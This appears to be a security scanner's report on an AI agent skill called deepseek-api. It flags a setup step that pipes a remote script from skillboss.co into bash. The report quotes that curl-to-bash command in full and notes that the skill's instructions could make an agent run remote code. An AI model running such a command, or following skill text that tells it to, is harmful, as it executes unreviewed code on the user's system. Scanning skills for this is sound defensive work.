deepseek-api

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 0.90). The domain "skillboss.co" is not a well-known vendor, and the presence of a direct .sh install script with explicit curl ... | bash instructions is a high-risk pattern for malware distribution because it runs unreviewed code from an untrusted source.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The Quick Setup instructs running "curl -fsSL https://skillboss.co/openclaw-setup.sh | bash", which fetches and executes remote code at runtime from https://skillboss.co/openclaw-setup.sh and is presented as a required setup step that can directly control agent behavior.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (low risk: 0.30). The prompt includes a curl | bash setup command that would execute remote code and could modify the host system, but it does not explicitly instruct the agent to obtain sudo, edit privileged system files, or create users.